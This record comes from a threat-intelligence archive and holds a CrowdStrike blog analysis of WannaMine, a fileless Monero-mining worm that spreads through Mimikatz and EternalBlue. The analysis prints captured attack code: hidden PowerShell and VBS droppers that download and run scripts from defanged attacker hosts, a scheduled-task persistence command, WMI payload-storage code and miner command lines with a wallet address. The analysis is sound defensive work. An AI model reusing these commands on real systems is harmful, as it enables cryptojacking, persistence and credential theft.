{
	"id": "9b0f8d14-0d32-49c9-8b9c-e7ff5b0637bd",
	"created_at": "2026-04-06T00:06:48.019581Z",
	"updated_at": "2026-04-10T03:28:20.572119Z",
	"deleted_at": null,
	"sha1_hash": "9405edda747804e76712746f2b8310e6d3246cdc",
	"title": "Cryptomining: Harmless Nuisance or Disruptive Threat?",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 611748,
	"plain_text": "Cryptomining: Harmless Nuisance or Disruptive Threat?\r\nBy rmcc.jb.ks\r\nArchived: 2026-04-02 10:39:30 UTC\r\nCryptocurrencies are in high demand. The usage and monetary value of Bitcoin, Litecoin, Ethereum, and many\r\nothers have skyrocketed worldwide. The increase in purchasing power and liquidity is driving valuations, as well\r\nas volatility, higher than ever before. Naturally, where there are profits to be had, crime is not far behind.\r\nCybercriminals have honed in on a highly profitable opportunity, using a distributed computing process for\r\nproduction of cryptocurrency — a process known as “mining.” Cryptocurrency mining is a resource-intensive\r\nprocess of authenticating transactions in return for a cryptocurrency reward. While mining itself is legal,\r\nfraudulently compromising systems to do the work is not. In recent months, CrowdStrike® has noticed an uptick\r\nin cyberattacks focused on cryptocurrency-mining tools that commandeer available CPU cycles, without\r\nauthorization, to make money. While cryptocurrency mining has typically been viewed as a nuisance,\r\nCrowdStrike has recently seen several cases where mining has impacted business operations, rendering some\r\ncompanies unable to operate for days and weeks at a time. The tools have caused systems and applications to\r\ncrash due to such high CPU utilization speeds. Furthermore, CrowdStrike has observed more sophisticated\r\ncapabilities built into a cryptomining worm dubbed WannaMine. This tool leverages persistence mechanisms and\r\npropagation techniques similar to those used by nation-state actors, demonstrating a trend highlighted in the recent\r\nCrowdStrike Cyber Intrusion Services Casebook 2017, which states that “contemporary attacks continue to blur\r\nthe lines between nation-state and eCrime tactics.” WannaMine employs “living off the land” techniques such as\r\nWindows Management Instrumentation (WMI) permanent event subscriptions as a persistence mechanism. It also\r\npropagates via the EternalBlue exploit popularized by WannaCry. Its fileless nature and use of legitimate system\r\nsoftware such as WMI and PowerShell make it difficult, if not impossible, for organizations to block it without\r\nsome form of next-generation antivirus. WannaMine, first reported by PandaSecurity, is a Monero cryptocurrency\r\nminer that hijacks a system’s CPU cycles to mine. This fileless malware leverages advanced tactics and techniques\r\nto maintain persistence within a network and move laterally from system to system. First, WannaMine uses\r\ncredentials acquired with the credential harvester Mimikatz to attempt to propagate and move laterally with\r\nlegitimate credentials. If unsuccessful, WannaMine attempts to exploit the remote system with the EternalBlue\r\nexploit used by WannaCry in early 2017. In one case, a client informed CrowdStrike that nearly 100 percent of its\r\nenvironment was rendered unusable due to overutilization of systems’ CPUs. Upon deployment of the\r\nCrowdStrike Falcon® endpoint protection platform, with default prevention capabilities, the client restored 80\r\npercent of its operational capability. With script blocking enabled, the client achieved 95 percent operational\r\ncapability within a couple of hours. Figure 1 below demonstrates the impact Falcon with script blocking had by\r\nimmediately blocking the WannaMine activity. This figure shows all suspicious detection activities across the\r\nclient’s enterprise, and the significant decline in critical detections due to blocked execution of WannaMine\r\nhttps://www.crowdstrike.com/blog/cryptomining-harmless-nuisance-disruptive-threat/\r\nPage 1 of 7\n\nfeatures via Falcon script blocking.\r\nFigure 1\r\nUpon deployment of the Falcon platform, CrowdStrike identified the tell-tale execution signs of WannaMine.\r\nSnippets of exploit code are shown in Figures 2 and 3, and the scheduled task is shown in Figure 4.\r\npowershell.exe -NoP -NonI -W Hidden -E\r\nJABzAHQAaQBtAGUAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBUAGkAYwBrAEMAbwB1AG4AdAANAA…\r\nFigure 2. Truncated base64-encoded PowerShell command\r\ncmd /v:on /c for /f \"tokens=2 delims=.\u003c\" %i in ('ver') do (set a=%i)\u0026if !a:~-1!==5 (@echo on error\r\nresume next\u003e%windir%\\11.vbs\u0026@echo Set ox=CreateObject^(\"MSXML2.XMLHTTP\"^)\u003e\u003e%windir%\\11.vbs\u0026@echo\r\nox.open \"GET\",\"http\u003c:\u003e//118.184.48\u003c.\u003e95:8000/info.vbs\",false\u003e\u003e%windir%\\11.vbs\u0026@echo\r\nox.setRequestHeader \"User-Agent\", \"-\"\u003e\u003e%windir%\\11.vbs\u0026@echo ox.send^(^)\u003e\u003e%windir%\\11.vbs\u0026@echo If\r\nox.Status=200 Then\u003e\u003e%windir%\\11.vbs\u0026@echo Set\r\noas=CreateObject^(\"ADODB.Stream\"^)\u003e\u003e%windir%\\11.vbs\u0026@echo oas.Open\u003e\u003e%windir%\\11.vbs\u0026@echo oas.Type=1\r\n\u003e\u003e%windir%\\11.vbs\u0026@echo oas.Write ox.ResponseBody\u003e\u003e%windir%\\11.vbs\u0026@echo oas.SaveToFile\r\n\"%windir%\\info.vbs\",2 \u003e\u003e%windir%\\11.vbs\u0026@echo oas.Close\u003e\u003e%windir%\\11.vbs\u0026@echo End\r\nif\u003e\u003e%windir%\\11.vbs\u0026@echo Set os=CreateObject^(\"WScript.Shell\"^)\u003e\u003e%windir%\\11.vbs\u0026@echo\r\nos.Exec^(\"cscript.exe %windir%\\info.vbs\"^)\u003e\u003e%windir%\\11.vbs\u0026cscript.exe %windir%\\11.vbs) else\r\n(powershell -NoP -NonI -W Hidden \"if((Get-WmiObject\r\nWin32_OperatingSystem).osarchitecture.contains('64')){IEX(New-Object\r\nNet.WebClient).DownloadString('http\u003c:\u003e//118.184.48\u003c.\u003e95:8000/info6.ps1')}else{IEX(New-Object\r\nNet.WebClient).DownloadString('http\u003c:\u003e//118.184.48\u003c.\u003e95:8000/info3.ps1')}\")\r\nFigure 3\r\nhttps://www.crowdstrike.com/blog/cryptomining-harmless-nuisance-disruptive-threat/\r\nPage 2 of 7\n\ncmd /c echo powershell -nop \"$a=((Get-WMIObject -Namespace root\\Subscription -Class\r\n__FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('SCM Event Filter')))) {IEX(New-Object Net.WebClient).DownloadString('http\u003c:\u003e//stafftest.spdns\u003c.\u003eeu:8000/mate6.ps1')}\" \u003e%temp%\\y1.bat\r\n\u0026\u0026 SCHTASKS /create /RU System /SC DAILY /TN yastcat /f /TR \"%temp%\\y1.bat\" \u0026\u0026SCHTASKS /run /TN\r\nyastcat\u003cc/ode\u003e\r\nFigure 4\r\nThis blog will touch on the files downloaded in Figures 3 and 4 later, but first, let’s address WannaMine’s WMI\r\nfeatures. Starting with analyzing the base64 -decoded output from Figure 2, we can see reference to many WMI\r\nclass functions – none of which look legitimate at first glance.\r\n… $funs = ( 'root\\default:Win32_TaskService').Properties\u003c'funs'\u003e.Value … Get-WmiObject\r\n__FilterToConsumerBinding -Namespace root\\subscription | Where-Object {$_.filter -notmatch 'SCM\r\nEvent'} |Remove-WmiObject … $cmdmon=\"powershell -NoP -NonI -W Hidden `\"`$mon = (\r\n'root\\default:Win32_TaskService').Properties\u003c'mon'\u003e.Value;`$funs = (\r\n'root\\default:Win32_TaskService').Properties\u003c'funs'\u003e.Value ;iex\r\n(::ASCII.GetString(::FromBase64String(`$funs)));Invoke-Command -ScriptBlock `$RemoteScriptBlock -\r\nArgumentList @(`$mon, `$mon, 'Void', 0, '', '')`\"\" … $mimi = (\r\n'root\\default:Win32_TaskService').Properties\u003c'mimi'\u003e.Value … $ipsu = (\r\n'root\\default:Win32_TaskService').Properties\u003c'ipsu'\u003e.Value $i17 = (\r\n'root\\default:Win32_TaskService').Properties\u003c'i17'\u003e.Value $scba= (\r\n'root\\default:Win32_TaskService').Properties\u003c'sc'\u003e.Value …\r\nFigure 5\r\nIn a previous blog, CrowdStrike highlighted the use of WmiClass, a type of accelerator for ManagementClass, or a\r\nshortcut to a WMI class definition. In this instance, the functions residing within the Win32_TaskService WMI\r\nclass look legitimate at first glance, because the class has a similar naming convention to other WMI classes.\r\nHowever, by querying the above definitions in that class, we can see it is not legitimate. Descriptions of the\r\ncontents of the properties can be seen in the table below.\r\nWin32_TaskService\r\nProperty\r\nFunction\r\nmon Monero CPU miner\r\nmimi Mimikatz credential harvesting tool\r\nfuns\r\nCombination of publicly available scripts to achieve remote DLL loading via\r\nWMI and obfuscated EternalBlue\r\ni17 Targeting\r\nipsu Targeting\r\nhttps://www.crowdstrike.com/blog/cryptomining-harmless-nuisance-disruptive-threat/\r\nPage 3 of 7\n\nsc yastcat Scheduled Task configuration\r\nJust to make sure we’ve identified all the functions within this class, we’ll query all the contents of the class and\r\nsee that there are two additional functions, “vcp” and “vcr.” These two functions correspond to two Visual C++\r\nredistributable DLL files, msvcp120.dll and msvcr120.dll. This shows that the malware chooses not to rely on the\r\nimpacted system for dependencies and will bring along all code needed to function properly. The clear takeaway\r\nfrom analysis of this malicious WMI class is that WannaMine is leveraging the WMI repository to store code for\r\nexecution. So how is the code in Figure 1 executing? Let’s start by considering y1.bat, identified in the scheduled\r\ntask shown in Figure 4.\r\npowershell -nop \"$a=((Get-WMIObject -Namespace root\\Subscription -Class __FilterToConsumerBinding\r\n));if(($a -eq $null) -or (!($a.contains('SCM Event Filter')))) {IEX(New-Object\r\nNet.WebClient).DownloadString('http\u003c:\u003e//stafftest.spdns\u003c.\u003eeu:8000/mate6.ps1')}\"\r\nFigure 6. Contents of y1.bat\r\nThis is not extremely helpful to our understanding of the attack, as it’s only performing the download\r\nfunctionality. But this is not the first time we’ve seen a check being performed for “SCM Event Filter” within\r\nWMI Filter to Consumer Bindings (see Figure 2 above). Let’s check into permanent event subscriptions, since\r\nWannaMine named the malicious WMI class to blend in.\r\nFigure 7\r\nSure enough, WannaMine is leveraging permanent event subscriptions to maintain persistence. This permanent\r\nevent subscription is set to execute the PowerShell command located in the Event Consumer every 90 minutes,\r\nper the Event Filter. Let’s circle back to the files downloaded in Figures 3 and 4. The batch script in Figure 3 first\r\nchecks the Windows version of the system it is running on by issuing the command “CMD /V:ON /C”. If the\r\nWindows Version is 5, in other words if the current system is running either Windows 2000, Windows XP,\r\nWindows XP 64-Bit, Windows Server 2003, or Windows Server 2003 R2, the script will drop a file named 11.vbs\r\nin C:\\Windows. The following are the contents of the script:\r\nON ERROR RESUME NEXT SET OX=CREATEOBJECT(\"MSXML2.XMLHTTP\") OX.OPEN\r\n\"GET\",\"HTTP\u003c:\u003e//STAFFTEST.FIREWALL-GATEWAY\u003c.\u003eCOM:8000/INFO.VBS\",FALSE OX.SETREQUESTHEADER \"USER-AGENT\", \"-\" OX.SEND() IF OX.STATUS=200 THEN SET OAS=CREATEOBJECT(\"ADODB.STREAM\") OAS.OPEN\r\nOAS.TYPE=1 OAS.WRITE OX.RESPONSEBODY OAS.SAVETOFILE \"C:\\Windows\\INFO.VBS\",2 OAS.CLOSE END IF\r\nSET OS=CREATEOBJECT(\"WSCRIPT.SHELL\") OS.EXEC(\"CSCRIPT.EXE C:\\Windows\\INFO.VBS\")\r\nhttps://www.crowdstrike.com/blog/cryptomining-harmless-nuisance-disruptive-threat/\r\nPage 4 of 7\n\nFigure 8\r\nThis script is responsible for calling out to stafftest.firewall-gateway\u003c.\u003ecom to download another vbs file named\r\ninfo.vbs, saving it in C:\\Windows and then executing it via cscript.exe. It should be noted that CrowdStrike\r\nanalysts also analyzed info.vbs, which is downloaded by the original batch script. The following is a snippet of the\r\ndeobfuscated file:\r\nSub WriteBinary(FileName, Buf) Const adTypeBinary = 1 Const adSaveCreateOverWrite = 2 Dim stream, xmldom, node\r\nSet xmldom = CreateObject(\"Microsoft.XMLDOM\") Set node = xmldom.CreateElement(\"binary\") node.DataType = \"bin.base64\" node.Text = Buf Set stream = CreateObject(\"ADODB.Stream\")\r\nstream.Type = adTypeBinary stream.Open stream.write node.NodeTypedValue stream.saveToFile FileName, adSaveCreateOverWrite stream.Close Set stream = Nothing Set node = Nothing Set xmldom = Nothing End Subbytes = \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASAAAAA4fug4AtAnNU\r\nFigure 9\r\nThe file decodes a base64-encoded binary embedded within itself, saves it in the %TEMP% folder and executes it\r\nwith the following (sanitized) command line:\r\n-B -o stratum+tcp://pool.supportxmr\u003c.\u003ecom:80 -\r\nu 46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE -o\r\nstratum+tcp://mine.xmrpool\u003c.\u003enet:80 -u\r\n46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE -o\r\nstratum+tcp://pool.minemonero\u003c.\u003epro:80 -u\r\n46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE -p x\r\nFigure 10\r\nThis is the actual payload responsible for utilizing the victim computer’s CPU cycles to mine Monero\r\ncryptocurrency. The following is the information regarding the binary:\r\nFile: taskservice.exe Size: 180736 MD5: 9AC3BDB9378CD1FAFBB8E08DEF738481 Compiled: Thu, Aug 31\r\n2017, 13:31:24 - 32 Bit EXE\r\nFigure 11\r\nIf the Windows version is either Windows Vista or above, the batch script will issue the following powershell\r\ncommand:\r\nPOWERSHELL -NOP -NONI -W HIDDEN “IF((GET-WMIOBJECT\r\nWIN32_OPERATINGSYSTEM).OSARCHITECTURE.CONTAINS(’64’)){IEX(NEW-OBJECT\r\nNET.WEBCLIENT).DOWNLOADSTRING(‘HTTP\u003c:\u003e//STAFFTEST.FIREWALL-GATEWAY\u003c.\u003eCOM:8000/INFO6.PS1′)}ELSE{IEX(NEW-OBJECT\r\nNET.WEBCLIENT).DOWNLOADSTRING(‘HTTP\u003c:\u003e//STAFFTEST.FIREWALL-GATEWAY\u003c.\u003eCOM:8000/INFO3.PS1′)}“)\r\nFigure 12\r\nIf the OS architecture is 64-bit, the script will call out to the aforementioned domain and download info6.ps1,\r\notherwise it downloads info3.ps1. Recovering info6.ps1 and mate6.ps1was possible and allowed CrowdStrike to\r\nunderstand how WannaMine was creating the malicious WMI class and subsequent properties. The two files are\r\nhttps://www.crowdstrike.com/blog/cryptomining-harmless-nuisance-disruptive-threat/\r\nPage 5 of 7\n\nsimilar, with minor changes depending on the OS architecture. After decoding the heavily obfuscated info6.ps1,\r\nwe see the WMI properties being set in Figure 13.\r\n$mimi=$fa.substring(0,1131864) $mon=$fa.substring(1131866,357720)\r\n$vcp=$fa.substring(1489588,880172) $vcr=$fa.substring(2369762,1284312)\r\n$funs=$fa.substring(3654076,497360) $sc=$fa.substring(4151438)$StaticClass = New-ObjectManagement.ManagementClass((('root\\default'),$null,$null) $StaticClass.Name=\r\n('Win32_TaskService') $StaticClass.Put() | Out-Null $StaticClass.Properties.Add(('mimi'),$mimi)\r\n$StaticClass.Put() | Out-Null $StaticClass.Properties.Add(('mon'),$mon) $StaticClass.Put() | Out-Null $StaticClass.Properties.Add(('vcp'),$vcp) $StaticClass.Put() | Out-Null\r\n$StaticClass.Properties.Add(('vcr'),$vcr) $StaticClass.Put() | Out-Null\r\n$StaticClass.Properties.Add(('funs'),$funs) $StaticClass.Put() | Out-Null\r\n$StaticClass.Properties.Add('sc',$sc) $StaticClass.Put() | Out-Null\r\n$StaticClass.Properties.Add(('ipsu'),\"\") $StaticClass.Put() | Out-Null\r\n$StaticClass.Properties.Add(('i17'),\"\") $StaticClass.Put() | Out-Null\r\nFigure 13\r\nCrowdStrike anticipates that these threat actors will continue to evolve their capabilities to go undetected. For\r\nexample, for the writing of this post, CrowdStrike analysts downloaded the current version of info6.ps1 from the\r\nadversary’s infrastructure. Contained within was similar code to create a malicious WMI class. However, the class\r\nname was called “Office_Updater” instead of “Win32_TaskService”.\r\nConclusion\r\nWhile the tactics, techniques, and procedures (TTPs) displayed in WannaMine did not require a high degree of\r\nsophistication, the attack clearly stands on the shoulders of more innovative and enterprising nation-state and\r\neCrime threat actors. Whatever these threat actors may lack in sophistication, they made up for in resourcefulness:\r\nWe should appreciate the lengths they went to achieve their goals, and what they learned from the public\r\nsuccesses and failures of other threat actors. In doing so, we take a vital step toward promoting a stronger security\r\nposture, better controls, and more disruptive defensive tactics. Companies should focus on beefing up their\r\nprevention and detection and response capabilities to ensure that they are able to detect these TTPs. Improved\r\ndefenses will become even more critical in 2018 as we expect to see continued convergence of sophisticated\r\nstatecraft and tradecraft.\r\nFalcon Endpoint Protection Platform (EPP)\r\nThe prevention features of CrowdStrike Falcon® EPP offer ample protection against this threat within your\r\nenvironment. The redacted screenshot below demonstrates Falcon’s WannaMine prevention in action.\r\nhttps://www.crowdstrike.com/blog/cryptomining-harmless-nuisance-disruptive-threat/\r\nPage 6 of 7\n\nFigure 14\r\nCrowdStrike expects to see much more cryptomining activity in 2018, resulting in business disruptions and\r\ndowntime that can impact the bottom line. As organizations and companies come to understand how these\r\ntraditionally unsophisticated actors are using increasingly sophisticated tactics, they can take a vital step toward\r\npromoting a stronger security posture and avoiding unnecessary interruptions that can affect critical business\r\nprocesses. Learn more about the CrowdStrike Falcon® platform\r\nand get full access to CrowdStrike's next-gen antivirus solution for 15 days by visiting the Falcon Prevent free\r\ntrial page.\r\nDownload a white paper: CrowdStrike Falcon®: Setting a New Standard in Endpoint Protection\r\nSource: https://www.crowdstrike.com/blog/cryptomining-harmless-nuisance-disruptive-threat/\r\nhttps://www.crowdstrike.com/blog/cryptomining-harmless-nuisance-disruptive-threat/\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.crowdstrike.com/blog/cryptomining-harmless-nuisance-disruptive-threat/"
	],
	"report_names": [
		"cryptomining-harmless-nuisance-disruptive-threat"
	],
	"threat_actors": [
		{
			"id": "81dde5cc-c29f-430d-8c6e-e5e92d5015e7",
			"created_at": "2022-10-25T16:07:23.704358Z",
			"updated_at": "2026-04-10T02:00:04.718034Z",
			"deleted_at": null,
			"main_name": "Harvester",
			"aliases": [],
			"source_name": "ETDA:Harvester",
			"tools": [
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"Graphon",
				"Metasploit",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434008,
	"ts_updated_at": 1775791700,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9405edda747804e76712746f2b8310e6d3246cdc.pdf",
		"text": "https://archive.orkl.eu/9405edda747804e76712746f2b8310e6d3246cdc.txt",
		"img": "https://archive.orkl.eu/9405edda747804e76712746f2b8310e6d3246cdc.jpg"
	}
}